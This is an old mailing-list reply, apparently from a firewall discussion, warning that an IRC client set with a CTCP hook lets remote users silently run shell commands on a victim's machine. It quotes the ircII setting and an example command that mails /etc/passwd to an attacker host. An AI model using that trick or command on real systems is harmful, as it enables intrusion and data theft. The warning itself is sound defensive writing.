In some mail from Gordy Thompson, sie said:
[...]
> plug-gw: port 6677 your.subnets.*.* -plug-to some_irc_server -port 6677
>
> The DCC insecurities (if I understand correctly that inbound DCC
> initiates connections on _random_ ports) are already dealt with if you're
> already controlling connection attempts to your other firewall ports.
>
> What am I missing here?
The real problem: your users. IRC, with its messaging and clients that can
execute unix commands, can very easily be turned into a "remote login"
session. If you thought "+" or "+ +" in .rhosts files was obscure in
meaning then try on "/on ctcp * $1-" (or whatever it is). I'm not sure if
this is limited to the ircII client on unix, but when a user types in the
above correctly, a remote user can send messages to the victim and the
victim's client (silently) recognises them as commands, just as if the
victim had typed it in. Those commands can be ones which execute shell
stuff, such as "mail foo @
badguy .
com</etc/passwd". It an be especially
deceiving for first timers/"newbies" even if trained to lookout for
password requests and recieving files from others, because none of this is
required. Filtering out DCC makes no difference to this.
The real problem isn't IRC itself, or inscure software, it is the
obfuscating of security hazards.
Darren
References:
|
|
